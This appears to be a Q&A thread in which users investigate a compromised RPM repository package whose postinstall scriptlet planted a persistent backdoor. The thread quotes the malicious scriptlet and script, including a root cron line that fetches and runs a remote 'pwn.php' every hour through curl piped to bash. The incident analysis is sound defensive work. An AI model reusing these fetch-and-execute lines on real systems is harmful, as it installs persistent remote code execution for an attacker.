
Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

How did the RPM create the file and how do I see what else it did?

Pascal
  • So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves? – Aaron Copley Jun 24 '19 at 20:40
  • The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form. – Pascal Jun 24 '19 at 20:47
  • And it's signed by them, too? – Aaron Copley Jun 24 '19 at 20:47
  • I don't know how to find that out. – Pascal Jun 24 '19 at 20:48
  • Did you have `gpgcheck=1` in your `/etc/yum.repos.d/getpagespeed-extras.repo`? Looks like this RPM might have replaced the file anyway, so you can't necessarily trust its current state. For some reason [it's considered an optional step](https://www.getpagespeed.com/redhat) in their configuration, but it's generally a good idea at preventing stuff like this from happening. – Aaron Copley Jun 24 '19 at 21:00
  • `https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm` is the original file, it still has an old date in their repo, and `gpgcheck=1` is set in it. – Pascal Jun 24 '19 at 21:05
  • Suggest you also contact the web admin at sayitwithagift.com although YMMV as to what kind of a response you get. I ended up going through a website's hosting provider to get in touch about a misconfigured mail server once as the website itself never responded. – Darren Jun 25 '19 at 10:57
  • @Darren I contacted sayitwithagift.com as well. – Pascal Jun 25 '19 at 16:22

3 Answers

# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1

https://www.getpagespeed.com/SCM/release-post-install.php contains:

#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
Pascal

You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.

rpm cannot completely track what happened because it is running an arbitrary script.

gpgcheck will not help you; both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:

$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub  2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub  2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.

It seems a bit paranoid to do the first install of software without Internet access, or to manually inspect the "post install" script. But unfortunately it almost seems necessary if packages do ill-advised tricks like this.

John Mahowald
  • The payload is a cron job that downloads and runs 'https://www.sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload. – Pascal Jun 24 '19 at 23:00
  • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does. – Pascal Jun 24 '19 at 23:31
  • Unclear whether the addition of code exec from the Internet is a legit idea, or added by the malware crew. The latter is even worse, because that implies the signing and upload processes were compromised. – John Mahowald Jun 25 '19 at 11:14

I have 5 CloudLinux/cPanel servers that used to have Nginx on them via Engintron, but they now run LiteSpeed webserver instead. I think Engintron may have left the pagespeed repos behind when it was uninstalled. cPanel runs an update check every night, and at about midnight all of my servers sent me an E-mail reporting:

/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1'

A search for the payload site led me here, where I see that on the same day you had the same issue. So, to add my info to your own: the same /etc/cron.d/sysstat2 file existed on all of my servers.

I deleted the file, removed the repos, and used the contact form at GetPageSpeed to report the issue. The owner of the Repo may be AWOL as there was a blog post saying that he was shutting the repo down due to health issues. So maybe the attacker either took advantage of the fact that the repo is not getting attention, or found an open door to exploit.

  • The message about shutting down the repo was posted after he received my email about being compromised. I asked him to open the repo again and post updated packages to remove `/etc/cron.d/sysstat2`. He has done so. – Pascal Jun 25 '19 at 20:49